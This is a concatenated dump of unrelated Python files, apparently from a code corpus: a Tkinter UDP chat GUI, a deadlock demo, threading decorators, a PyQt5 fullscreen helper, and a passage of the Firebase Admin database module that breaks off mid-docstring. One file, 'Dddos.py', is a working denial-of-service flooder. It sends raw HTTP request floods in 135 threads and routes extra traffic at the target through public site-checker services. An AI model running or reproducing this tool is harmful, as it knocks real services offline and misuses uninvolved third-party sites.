self.port = port
self.addr = (self.host, self.port)
@staticmethod
def validate_host(host):
L=host.split('.')
if len(L)!=4:
return None
for i in L:
if not i.isdigit():return None
if not 0<=int(i)<=255:return None
return host
@staticmethod
def validate_port(port):
if port.isdigit():
port=int(port)
if 5000<=port<=25000:
return port
else:return None
class ReceiverConnection:
def __init__(self):
self.host = gethostbyname(gethostname())
self.port = random.randint(5000, 25000)
self.addr = (self.host, self.port)
self.sock = socket(AF_INET, SOCK_DGRAM)
self.sock.bind(self.addr)
self.buffer = 8 * 1024
self.results = None
def get_host(self):
return self.host
def get_port(self):
return self.port
class MainWindow(Tk):
def __init__(self):
super().__init__()
self.current_page = None
self.title('File Transfer')
self.size = (350, 550)
self.switch_to_page(FirstPage)
self.geometry('450x650')
self.resizable(0, 0)
self.transfer_object=None # This is the object that is
# going to be transferred to the next frame
# This object can be Sender/ ReceiverConnection object
def switch_to_page(self, page):
new_page = page(self)
if self.current_page:
self.current_page.destroy()
self.current_page = new_page
self.current_page.pack(side=TOP, fill=X, expand=True)
class FirstPage(Frame):
def __init__(self, master):
super().__init__()
self.master = master
ttk.Label(self, text='First Page', font='"Product Sans" 28 bold').pack(side=TOP)
self.choice = StringVar()
# input('Pause..')
ttk.Radiobutton(self, text='Sender', variable=self.choice, value='sender', command=self.enablesubmit).pack()
ttk.Radiobutton(self, text='Receiver', variable=self.choice, value='receiver', command=self.enablesubmit).pack()
ttk.Button(self, text='Quit', command=self.master.quit).pack(side=BOTTOM)
self.submit_btn=ttk.Button(self, text='Submit', command=self.submit, state='disabled') # Submit button
self.submit_btn.pack(side=BOTTOM)
def submit(self):
if self.choice.get() == 'sender':
self.master.switch_to_page(SenderPage)
elif self.choice.get() == 'receiver':
self.master.switch_to_page(ReceiverPage)
def enablesubmit(self):
self.submit_btn['state']='normal'
class SenderPage(Frame):
def __init__(self, master):
super().__init__()
self.master = master
self.Sender = SenderConnection()
# Add widgets
ttk.Label(self, text='Sender Page', font='"Product Sans" 22 bold').pack(side=TOP)
self.host_label=Label(self, text="Enter IP address in the box below: ")
self.host_label.pack()
self.host_entry = ttk.Entry(self, font='"Fira Code" 14', cursor='ibeam')
self.host_entry.focus()
self.host_entry.bind("<Return>", self.set_host)
self.host_entry.pack()
ttk.Separator(self).pack(fill=X)
self.port_label=Label(self, text="Enter port address in the box below: ")
self.port_label.pack()
self.port_entry = ttk.Entry(self, font='"Fira Code" 14', cursor='ibeam')
self.port_entry.bind("<Return>", self.set_port)
self.port_entry.pack()
self.show_host=Label(self, text="")
self.show_port=Label(self, text="")
self.show_host.pack()
self.show_port.pack()
ttk.Button(self, text='Quit', command=self.master.quit).pack(side=BOTTOM)
self.next_page=ttk.Button(self, text='Next', state='disabled', command=self.next)
self.next_page.pack(side=BOTTOM)
def set_host(self, temp):
temp = self.host_entry.get()
host=self.Sender.validate_host(temp)
if host:
self.Sender.set_host(host)
self.host_entry.delete(0, END)
self.host_label['fg']='black'
self.host_label['text']=f'Target IP address is set to - {host}'
else:
self.host_label['fg']='red'
if self.Sender.host:
msg=f'IP address INVALID, still set to - {self.Sender.host}'
else:
msg='IP address INVALID, enter again!'
self.host_label['text']=msg
self.enable_next()
def set_port(self, temp):
temp = self.port_entry.get()
port= self.Sender.validate_port(temp)
if port:
self.Sender.set_port(port)
self.port_entry.delete(0, END)
self.port_label['fg']='black'
self.port_label['text']=f'Port address set to - {port}'
else:
self.port_label['fg']='red'
if self.Sender.port:
msg=f'Port number INVALID, port is still set to - {self.Sender.port}!'
else:
msg='Port number INVALID, enter again!'
self.port_label['text']=msg
self.enable_next()
def enable_next(self):
if self.Sender.host and self.Sender.port:
self.next_page['state'] = 'normal'
def next(self):
self.master.transfer_object=self.Sender # Transfer the object to the next frame
print('Going to the next page')
self.master.switch_to_page(SenderPage2)
class SenderPage2(Frame):
def __init__(self, master):
super().__init__()
self.master = master
self.Sender = self.master.transfer_object # Sender is now with this Frame
# Add Widgets
ttk.Label(self, text='Message Sender Page', font='"Product Sans" 20 bold').pack(side=TOP)
ttk.Label(self, text=f'Sending messages to {self.Sender.host}', font='"Product Sans" 12 bold').pack(side=TOP)
ttk.Label(self, text=f'On port {self.Sender.port}', font='"Product Sans" 10 italic').pack(side=TOP)
self.send_message_btn=ttk.Button(self, text='Send', command=self.send_message)
self.send_message_btn.pack(side=BOTTOM)
self.message_entry = ttk.Entry(self, cursor='ibeam')
self.message_entry.pack(side=BOTTOM, fill=X)
def send_message(self):
data=self.message_entry.get()
self.message_entry.delete(0, END)
self.Sender.send_data(data.encode())
print(data, 'sent to', self.Sender.addr)
class ReceiverPage(Frame):
def __init__(self, master):
super().__init__()
self.master = master
self.Receiver = ReceiverConnection()
self.thread_run = True # If set false, all running threads will close
# Add widgets
ttk.Label(self, text='Receiver Page', font='"Product Sans" 22 underline').pack(side=TOP)
ttk.Label(self, text=f'Your IP address is: {self.Receiver.get_host()}',
font='"Fira Code" 9').pack()
ttk.Label(self, text=f'Your port number is: {self.Receiver.get_port()}',
font='"Fira Code" 9').pack()
self.data_label = Label(self, text='', font='"Product Sans" 8 underline')
ttk.Button(self, text='Quit', command=self.close).pack(side=BOTTOM)
self.check_new_messages() # A function that checks for new messages in a thread
# t = Thread(target=self.Receiver.sock.recvfrom, args=(self.Receiver.buffer,))
# t.start()
def check_new_messages(self):
task = Thread(target=self.check_messages_helper)
task.start()
def check_messages_helper(self):
while True:
if not self.thread_run:
break
print('Listening on',self.Receiver.host)
data, addr = self.Receiver.sock.recvfrom(self.Receiver.buffer)
print('Got data-',data.decode())
other = addr[0]  # recvfrom returns (host, port); keep the sender's address
data = data.decode()
self.data_label['text'] = f'{other}: {data}'
def close(self):
self.thread_run = False
sys.exit()
m = MainWindow()
m.mainloop()
|
deadlock.py
|
import threading
import time
import logging
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
def acquire_a_b(a, b):
logging.info("t1 wants to acquire a")
a.acquire()
logging.info("t1 acquires a")
time.sleep(1)
logging.info("t1 wants to acquire b")
b.acquire()
logging.info("t1 acquires b")
a.release()
b.release()
def acquire_b_a(a, b):
logging.info("t2 wants to acquire b")
b.acquire()
logging.info("t2 acquires b")
time.sleep(1)
logging.info("t2 wants to acquire a")
a.acquire()
logging.info("t2 acquires a")
b.release()
a.release()
if __name__ == '__main__':
a = threading.Lock()
b = threading.Lock()
t1 = threading.Thread(target=acquire_a_b, args=(a, b))
t2 = threading.Thread(target=acquire_b_a, args=(a, b))
t1.start()
t2.start()
t1.join()
t2.join()
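# A minimal sketch, assuming the same `a` and `b` locks as above, of how this
# deadlock is avoided: both workers acquire the locks in one global order, so
# neither can hold one lock while waiting for the other in reverse.
#
#   def acquire_in_order(name, first, second):
#       logging.info("%s wants both locks", name)
#       with first:
#           time.sleep(1)
#           with second:
#               logging.info("%s holds both locks", name)
#
#   t1 = threading.Thread(target=acquire_in_order, args=("t1", a, b))
#   t2 = threading.Thread(target=acquire_in_order, args=("t2", a, b))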
|
Dddos.py
|
import os
from queue import Queue
from optparse import OptionParser
import time, sys, socket, threading, logging, urllib.request, random
os.system ('clear')
def user_agent():
global uagent
uagent=[]
uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
return(uagent)
def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://ip-calculator.ru/siteip/?domain=")
bots.append("http://sitechecker.pro/app/main/project/598886/progress?guest_project_id=598886&guest_project_title=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://check-host.net/ip-info?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-udp?host=")
bots.append("http://check-host.net/check-udp?host=")
bots.append("http://check-host.net/check-udp?host=")
bots.append("http://check-host.net/check-udp?host=")
bots.append("http://check-host.net/check-dns?host=")
bots.append("http://check-host.net/check-dns?host=")
bots.append("http://check-host.net/check-dns?host=")
bots.append("http://check-host.net/check-dns?host=")
bots.append("http://www.reg.ru/choose/domain/?domains=")
bots.append("http://www.reg.ru/choose/domain/?domains=")
bots.append("http://www.reg.ru/choose/domain/?domains=")
bots.append("http://www.reg.ru/choose/domain/?domains=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-ping?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-http?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://check-host.net/check-tcp?host=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
bots.append("http://2ip.ua/ru/services/ip-service/ping-traceroute?ip=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print ("\033[31m Успешно...\033[0m \033[92m <-- ip адрес упал --> \033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <-- Пакет отправлен --> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91m Нет соединение! сервер может быть выключен\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m
88888888ba, 88888888ba, 88888888ba, ,ad8888ba, ad88888ba
88 `"8b 88 `"8b 88 `"8b d8"' `"8b d8" "8b
88 `8b 88 `8b 88 `8b d8' `8b Y8,
88 88 88 88 88 88 88 88 `Y8aaaaa,
88 88 aaaaaaaa 88 88 88 88 88 88 `"""""8b,
88 8P """""""" 88 8P 88 8P Y8, ,8P `8b
88 .a8P 88 .a8P 88 .a8P Y8a. .a8P Y8a a8P
88888888Y"' 88888888Y"' 88888888Y"' `"Y8888Y"' "Y88888P"
Что бы запустить:
phyton3 Dddos.py -s ip адрес -p Порт -t 135
-s : Сервер ip
-p : Порт Дефолтный 80
-t : По умолчанию 135 \033[0m ''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# Чтение заголовка
global data
headers = open("hakddos.txt", "r")
data = headers.read()
headers.close()
#очередь задач q, w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," Порт: ",str(port)," Турбо: ",str(thr),"\033[0m")
print("\033[94m Пожалуйста, подождите...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91m Проверьте домен и порт сервера\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # если поток существует, он умирает
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # если поток существует, он умирает
t2.start()
start = time.time()
#многозадачность
item = 0
while True:
if (item>1800): # без сбоя памяти
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
asynx.py
|
from functools import wraps
from multiprocessing import Process, get_context
from multiprocessing.queues import Queue
from threading import Thread
import time
from multiprocessing import Lock
class BlockedQueue(Queue):
def __init__(self, maxsize=-1, block=True, timeout=None):
self.block = block
self.timeout = timeout
super().__init__(maxsize, ctx=get_context())
def put(self, obj, block=True, timeout=None):
super().put(obj, block=self.block, timeout=self.timeout)
def get(self, block=True, timeout=None):
if self.empty():
return None
return super().get(block=self.block, timeout=self.timeout)
def _execute(queue, f, *args, **kwargs):
try:
queue.put(f(*args, **kwargs))
except Exception as e:
queue.put(e)
def threaded(timeout=None, block=True):
def decorator(func):
queue = BlockedQueue(1, block, timeout)
@wraps(func)
def wrapper(*args, **kwargs):
args = (queue, func) + args
t = Thread(target=_execute, args=args, kwargs=kwargs)
t.start()
return queue.get()
return wrapper
return decorator
def processed(timeout=None, block=True):
def decorator(func):
queue = BlockedQueue(1, block, timeout)
@wraps(func)
def wrapper(*args, **kwargs):
args = (queue, func) + args
p = Process(target=_execute, args=args, kwargs=kwargs)
p.start()
return queue.get()
return wrapper
return decorator
def async_call(async_api=Thread, timeout=None, block=True):
def decorator(func):
queue = BlockedQueue(1, block, timeout)
@wraps(func)
def wrapper(*args, **kwargs):
args = (queue, func) + args
# 'async' is a reserved keyword since Python 3.7, so use a different name.
worker = async_api(target=_execute, args=args, kwargs=kwargs)
worker.start()
return queue.get()
return wrapper
return decorator
def scheduled(period, delay=None, loop_count=None):
delay = delay or 0
loop_count = loop_count or 0
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
counter = 0
time.sleep(delay)
while True:
start = time.time()
if loop_count and loop_count > 0:
if counter == loop_count:
break
counter += 1
func(*args, **kwargs)
run_time = time.time() - start
if run_time < period:
time.sleep(period - run_time)
return wrapper
return decorator
simple_lock = Lock()
def synchronized(lock=simple_lock):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
with lock:
return func(*args, **kwargs)
return wrapper
return decorator
if __name__ == '__main__':
@threaded(block=False)
def test1(x):
time.sleep(x)
print("test 1")
@processed(block=False)
def test2(x):
time.sleep(x)
print("test 2")
@threaded(block=False)
@scheduled(period=2, loop_count=3)
def test3(x):
time.sleep(x)
print("test 3")
@threaded()
@scheduled(period=1, loop_count=2)
@processed()
def test_pow(x):
print(x * x)
@threaded()
@synchronized()
def lock_test_a():
print('lock_test_a')
@async_call(Thread)
@synchronized()
def lock_test_b():
print('lock_test_b')
test3(0)
test1(2)
test2(1)
test_pow(5)
lock_test_a()
lock_test_b()
|
pyqt5_fullscreen.py
|
import os
import sys
import tempfile
from multiprocessing import Process
import numpy as np
from PyQt5 import QtWidgets, QtGui, QtCore
def resize(image, size):
import importlib
is_pillow_available = importlib.util.find_spec("PIL") is not None
width, height = size
if is_pillow_available:
from PIL import Image
pil_img = Image.fromarray(image)
pil_img = pil_img.resize((width, height), Image.NEAREST)
return np.array(pil_img)
else:
import cv2
return cv2.resize(image, (width, height), interpolation=cv2.INTER_NEAREST)
class FullScreen:
"""Full-screen with PyQt5 backend
Caution! This FullScreen class is really TRICKY.
"""
def __init__(self):
app = QtWidgets.QApplication([])
screen = app.primaryScreen()
size = screen.size()
self.width = size.width()
self.height = size.height()
self.tmpdir_img = tempfile.TemporaryDirectory()
self.filename_img = os.path.join(self.tmpdir_img.name, "tmp_image.dat")
self.img = np.memmap(
self.filename_img, dtype=np.uint8, mode="w+", shape=self.shape
)
self.tmpdir_flag = tempfile.TemporaryDirectory()
self.filename_flag = os.path.join(self.tmpdir_flag.name, "tmp_flag.dat")
self.flag = np.memmap(
self.filename_flag, dtype=np.uint8, mode="w+", shape=(1)
)
# set initial image
img_gray = np.full(self.shape, 127, dtype=np.uint8)
self.imshow(img_gray)
# launch fullscreen app
self.p = Process(target=self._launch_fullscreen_app)
self.p.start()
@property
def shape(self):
return self.height, self.width, 3
def imshow(self, image):
if image.ndim == 2:
img_rgb = np.dstack([image] * 3) # Gray -> RGB
else:
img_rgb = image[:, :, ::-1] # BGR -> RGB
if img_rgb.shape != self.shape:
img_rgb = resize(img_rgb, (self.width, self.height))
self.img[:] = img_rgb[:]
self.flag[:] = True
def _launch_fullscreen_app(self):
class QWidgetFullScreen(QtWidgets.QLabel):
def __init__(self, filename_img, shape, filename_flag):
super().__init__()
self.img = np.memmap(
filename_img, dtype=np.uint8, mode="r", shape=shape
)
self.height, self.width, ch = self.img.shape
self.flag = np.memmap(
filename_flag, dtype=np.uint8, mode="r+", shape=(1)
)
self.update_image()
f = 60.0 # update rate Hz
timer = QtCore.QTimer(self)
timer.timeout.connect(self.update_image)
timer.start(int(1000.0 / f))  # ms (QTimer.start expects an integer)
self.setCursor(QtCore.Qt.BlankCursor)
self.showFullScreen()
def __del__(self):
# Close mmap objects
if hasattr(self, "img"):
self.img._mmap.close()
del self.img
if hasattr(self, "flag"):
self.flag._mmap.close()
del self.flag
def update_image(self):
if self.flag:
qt_img = QtGui.QImage(
self.img.flatten(),
self.width,
self.height,
QtGui.QImage.Format_RGB888,
)
self.setPixmap(QtGui.QPixmap.fromImage(qt_img))
self.update()
self.flag[:] = False
app = QtWidgets.QApplication([])
fullscreen_widget = QWidgetFullScreen(
self.filename_img, self.shape, self.filename_flag
)
sys.exit(app.exec_())
def destroyWindow(self):
self.__del__()
def __del__(self):
# Terminate fullscreen app
if hasattr(self, "p"):
if self.p is not None:
self.p.terminate()
del self.p
# Close mmap objects
if hasattr(self, "img"):
self.img._mmap.close()
del self.img
if hasattr(self, "flag"):
self.flag._mmap.close()
del self.flag
# Remove tmpfile
if hasattr(self, "tmpdir_img"):
self.tmpdir_img.cleanup()
if hasattr(self, "tmpdir_flag"):
self.tmpdir_flag.cleanup()
|
db.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Firebase Realtime Database module.
This module contains functions and classes that facilitate interacting with the Firebase Realtime
Database. It supports basic data manipulation operations, as well as complex queries such as
limit queries and range queries. However, it does not support realtime update notifications. This
module uses the Firebase REST API underneath.
"""
import collections
import json
import os
import sys
import threading
import google.auth
import requests
import six
from six.moves import urllib
import firebase_admin
from firebase_admin import exceptions
from firebase_admin import _http_client
from firebase_admin import _sseclient
from firebase_admin import _utils
_DB_ATTRIBUTE = '_database'
_INVALID_PATH_CHARACTERS = '[].?#$'
_RESERVED_FILTERS = ('$key', '$value', '$priority')
_USER_AGENT = 'Firebase/HTTP/{0}/{1}.{2}/AdminPython'.format(
firebase_admin.__version__, sys.version_info.major, sys.version_info.minor)
_TRANSACTION_MAX_RETRIES = 25
_EMULATOR_HOST_ENV_VAR = 'FIREBASE_DATABASE_EMULATOR_HOST'
def reference(path='/', app=None, url=None):
"""Returns a database ``Reference`` representing the node at the specified path.
If no path is specified, this function returns a ``Reference`` that represents the database
root. By default, the returned References provide access to the Firebase Database specified at
app initialization. To connect to a different database instance in the same Firebase project,
specify the ``url`` parameter.
Args:
path: Path to a node in the Firebase realtime database (optional).
app: An App instance (optional).
url: Base URL of the Firebase Database instance (optional). When specified, takes
precedence over the ``databaseURL`` option set at app initialization.
Returns:
Reference: A newly initialized Reference.
Raises:
ValueError: If the specified path or app is invalid.
"""
service = _utils.get_app_service(app, _DB_ATTRIBUTE, _DatabaseService)
client = service.get_client(url)
return Reference(client=client, path=path)
def _parse_path(path):
"""Parses a path string into a set of segments."""
if not isinstance(path, six.string_types):
raise ValueError('Invalid path: "{0}". Path must be a string.'.format(path))
if any(ch in path for ch in _INVALID_PATH_CHARACTERS):
raise ValueError(
'Invalid path: "{0}". Path contains illegal characters.'.format(path))
return [seg for seg in path.split('/') if seg]
class Event(object):
"""Represents a realtime update event received from the database."""
def __init__(self, sse_event):
self._sse_event = sse_event
self._data = json.loads(sse_event.data)
@property
def data(self):
"""Parsed JSON data of this event."""
return self._data['data']
@property
def path(self):
"""Path of the database reference that triggered this event."""
return self._data['path']
@property
def event_type(self):
"""Event type string (put, patch)."""
return self._sse_event.event_type
class ListenerRegistration(object):
"""Represents the addition of an event listener to a database reference."""
def __init__(self, callback, sse):
"""Initializes a new listener with given parameters.
This is an internal API. Use the ``db.Reference.listen()`` method to start a
new listener.
Args:
callback: The callback function to fire in case of event.
sse: A transport session to make requests with.
"""
self._callback = callback
self._sse = sse
self._thread = threading.Thread(target=self._start_listen)
self._thread.start()
def _start_listen(self):
# iterate the sse client's generator
for sse_event in self._sse:
# only inject data events
if sse_event:
self._callback(Event(sse_event))
def close(self):
"""Stops the event listener represented by this registration
This closes the SSE HTTP connection, and joins the background thread.
"""
self._sse.close()
self._thread.join()
class Reference(object):
"""Reference represents a node in the Firebase realtime database."""
def __init__(self, **kwargs):
"""Creates a new Reference using the provided parameters.
This method is for internal use only. Use db.reference() to obtain an instance of
Reference.
"""
self._client = kwargs.get('client')
if 'segments' in kwargs:
self._segments = kwargs.get('segments')
else:
self._segments = _parse_path(kwargs.get('path'))
self._pathurl = '/' + '/'.join(self._segments)
@property
def key(self):
if self._segments:
return self._segments[-1]
return None
@property
def path(self):
return self._pathurl
@property
def parent(self):
if self._segments:
return Reference(client=self._client, segments=self._segments[:-1])
return None
def child(self, path):
"""Returns a Reference to the specified child node.
The path may point to an immediate child of the current Reference, or a deeply nested
child. Child paths must not begin with '/'.
Args:
path: Path to the child node.
Returns:
Reference: A database Reference representing the specified child node.
Raises:
ValueError: If the child path is not a string, not well-formed or begins with '/'.
"""
if not path or not isinstance(path, six.string_types):
raise ValueError(
'Invalid path argument: "{0}". Path must be a non-empty string.'.format(path))
if path.startswith('/'):
raise ValueError(
'Invalid path argument: "{0}". Child path must not start with "/"'.format(path))
full_path = self._pathurl + '/' + path
return Reference(client=self._client, path=full_path)
def get(self, etag=False, shallow=False):
"""Returns the value, and optionally the ETag, at the current location of the database.
Args:
etag: A boolean indicating whether the Etag value should be returned or not (optional).
shallow: A boolean indicating whether to execute a shallow read (optional). Shallow
reads do not retrieve the child nodes of the current database location. Cannot be
set to True if ``etag`` is also set to True.
Returns:
object: If etag is False returns the decoded JSON value of the current database location.
If etag is True, returns a 2-tuple consisting of the decoded JSON value and the Etag
associated with the current database location.
Raises:
ValueError: If both ``etag`` and ``shallow`` are set to True.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if etag:
if shallow:
raise ValueError('etag and shallow cannot both be set to True.')
headers, data = self._client.headers_and_body(
'get', self._add_suffix(), headers={'X-Firebase-ETag' : 'true'})
return data, headers.get('ETag')
else:
params = 'shallow=true' if shallow else None
return self._client.body('get', self._add_suffix(), params=params)
def get_if_changed(self, etag):
"""Gets data in this location only if the specified ETag does not match.
Args:
etag: The ETag value to be checked against the ETag of the current location.
Returns:
tuple: A 3-tuple consisting of a boolean, a decoded JSON value and an ETag. If the ETag
specified by the caller did not match, the boolean value will be True and the JSON
and ETag values would reflect the corresponding values in the database. If the ETag
matched, the boolean value will be False and the other elements of the tuple will be
None.
Raises:
ValueError: If the ETag is not a string.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if not isinstance(etag, six.string_types):
raise ValueError('ETag must be a string.')
resp = self._client.request('get', self._add_suffix(), headers={'if-none-match': etag})
if resp.status_code == 304:
return False, None, None
else:
return True, resp.json(), resp.headers.get('ETag')
def set(self, value):
"""Sets the data at this location to the given value.
The value must be JSON-serializable and not None.
Args:
value: JSON-serializable value to be set at this location.
Raises:
ValueError: If the provided value is None.
TypeError: If the value is not JSON-serializable.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if value is None:
raise ValueError('Value must not be None.')
self._client.request('put', self._add_suffix(), json=value, params='print=silent')
def set_if_unchanged(self, expected_etag, value):
"""Conditonally sets the data at this location to the given value.
Sets the data at this location to the given value only if ``expected_etag`` is same as the
ETag value in the database.
Args:
expected_etag: Value of ETag we want to check.
value: JSON-serializable value to be set at this location.
Returns:
tuple: A 3-tuple consisting of a boolean, a decoded JSON value and an ETag. The boolean
indicates whether the set operation was successful or not. The decoded JSON and the
ETag corresponds to the latest value in this database location.
Raises:
ValueError: If the value is None, or if expected_etag is not a string.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
# pylint: disable=missing-raises-doc
if not isinstance(expected_etag, six.string_types):
raise ValueError('Expected ETag must be a string.')
if value is None:
raise ValueError('Value must not be None.')
try:
headers = self._client.headers(
'put', self._add_suffix(), json=value, headers={'if-match': expected_etag})
return True, value, headers.get('ETag')
except exceptions.FailedPreconditionError as error:
http_response = error.http_response
if http_response is not None and 'ETag' in http_response.headers:
etag = http_response.headers['ETag']
snapshot = http_response.json()
return False, snapshot, etag
else:
raise error
def push(self, value=''):
"""Creates a new child node.
The optional value argument can be used to provide an initial value for the child node. If
no value is provided, the child node will have an empty string as its default value.
Args:
value: JSON-serializable initial value for the child node (optional).
Returns:
Reference: A Reference representing the newly created child node.
Raises:
ValueError: If the value is None.
TypeError: If the value is not JSON-serializable.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if value is None:
raise ValueError('Value must not be None.')
output = self._client.body('post', self._add_suffix(), json=value)
push_id = output.get('name')
return self.child(push_id)
def update(self, value):
"""Updates the specified child keys of this Reference to the provided values.
Args:
value: A dictionary containing the child keys to update, and their new values.
Raises:
ValueError: If value is empty or not a dictionary.
FirebaseError: If an error occurs while communicating with the remote database server.
"""
if not value or not isinstance(value, dict):
raise ValueError('Value argument must be a non-empty dictionary.')
if None in value.keys():
raise ValueError('Dictionary must not contain None keys.')
self._client.request('patch', self._add_suffix(), json=value, params='print=silent')
def delete(self):
"""Deletes this node from the database.
Raises:
FirebaseError: If an error occurs while communicating with the remote database server.
"""
self._client.request('delete', self._add_suffix())
def listen(self, callback):
"""Registers the ``callback`` function to receive realtime updates.
The specified callback function will get invoked with ``db.Event`` objects for each
realtime update received from the database. It will also get called whenever the SDK
reconnects to the server due to network issues or credential expiration. In general,
the OAuth2 credentials used to authorize connections to the server expire every hour.
Therefore clients should expect the ``callback`` to fire at least once every hour, even if
there are no updates in the database.
This API is based on the event streaming support available in the Firebase REST API. Each
call to ``listen()`` starts a new HTTP connection and a background thread. This is an
experimental feature. It currently does not honor the auth overrides and timeout settings.
Cannot be used in thread-constrained environments like Google App Engine.
Args:
callback: A function to be called when a data change is detected.
Returns:
ListenerRegistration: An object that can be used to stop the event listener.
Raises:
FirebaseError: If an error occurs while starting the initial HTTP connection.
"""
session = _sseclient.KeepAuthSession(self._client.credential, self._client.timeout)
return self._listen_with_session(callback, session)
def transaction(self, transaction_update):
"""Atomically modifies the data at this location.
Unlike a normal ``set()``, which just overwrites the data regardless of its previous state,
``transaction()`` is used to modify the existing value to a new value, ensuring there are
no conflicts with other clients simultaneously writing to the same location.
This is accomplished by passing an update function which is used to transform the current
value of this reference into a new value. If another client writes to this location before
the new value is successfully saved, the update function is called again with the new
current value, and the write will be retried. In case of repeated failures, this method
will retry the transaction up to 25 times before giving up and raising a
TransactionAbortedError. The update function may also force an early abort by raising an
exception instead of returning a value.
Args:
